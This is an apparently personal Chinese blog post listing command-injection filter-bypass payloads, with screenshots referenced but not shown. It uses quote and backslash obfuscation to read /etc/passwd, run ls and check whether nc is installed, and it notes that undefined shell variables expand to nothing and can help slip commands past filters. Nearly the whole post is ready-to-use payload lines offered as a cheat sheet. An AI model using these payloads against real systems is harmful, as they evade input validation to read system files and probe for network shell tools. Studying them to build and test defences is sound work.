命令执行绕过Payload

2019-12-31

读取/etc/passwd

1	/'b'i'n'/'c'a't' /'e't'c'/'p'a's's'w'd

执行ls

1	'''l''s'''

查看nc是否安装

1	'/''b'i'n'/'w'h'i'c'h' 'n''c'''

或者

1	/"b"i"n"/"w"h"i"c"h" "n"c

又或者

1	/b\i\n/w\h\i\c\h n\c

先来看看没有定义的变量($a)

image_1cos7tbn91v4cemf93d1184ids9.png-10.5kB

可以看到返回的是null，那么可以去利用这个特性来执行其他命令

image_1cos80n882kshpq1g2413pu1dc9m.png-63kB

最終更新：2019-12-31 12:05:26
未经允许，禁止转载：https://fuckgo.github.io/2019/12/31/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87Payload/

$_Fuck

赏